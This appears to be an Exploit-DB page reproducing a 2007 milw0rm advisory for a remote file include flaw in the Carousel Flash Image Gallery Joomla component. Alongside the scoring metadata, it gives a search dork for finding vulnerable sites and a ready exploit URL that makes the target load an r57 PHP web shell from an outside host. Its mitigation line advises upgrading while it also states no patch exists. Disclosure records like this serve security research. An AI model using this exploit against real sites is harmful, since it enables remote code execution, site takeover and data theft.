Carousel Flash Image Gallery Joomla Component Remote File Include Vulnerability

vendor:

Carousel Flash Image Gallery Joomla Component

by:

Crackers_Child

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Carousel Flash Image Gallery Joomla Component

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Carousel Flash Image Gallery Joomla Component Remote File Include Vulnerability

This vulnerability allows an attacker to include remote files in the Joomla component Carousel Flash Image Gallery, potentially leading to remote code execution.

Mitigation:

Upgrade to a patched version of the Carousel Flash Image Gallery Joomla Component.

Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       Carousel Flash Image Gallery Joomla Component
*    [~] Download.....:       http://justjoomla.net/joomla-components/carousel-flash-image-gallery.html
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File Ä°nclude Vulnerability
*    [~] Dork.........:       inurl:"com_jjgallery
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*     
*
*       [~] Exploit Rfi...:     http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?
*
*                             
+_______________________________________________________________________________________________________________________+



        [~] Ä°nfo......: f3ck y0ur l3fe
                      



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-11-16]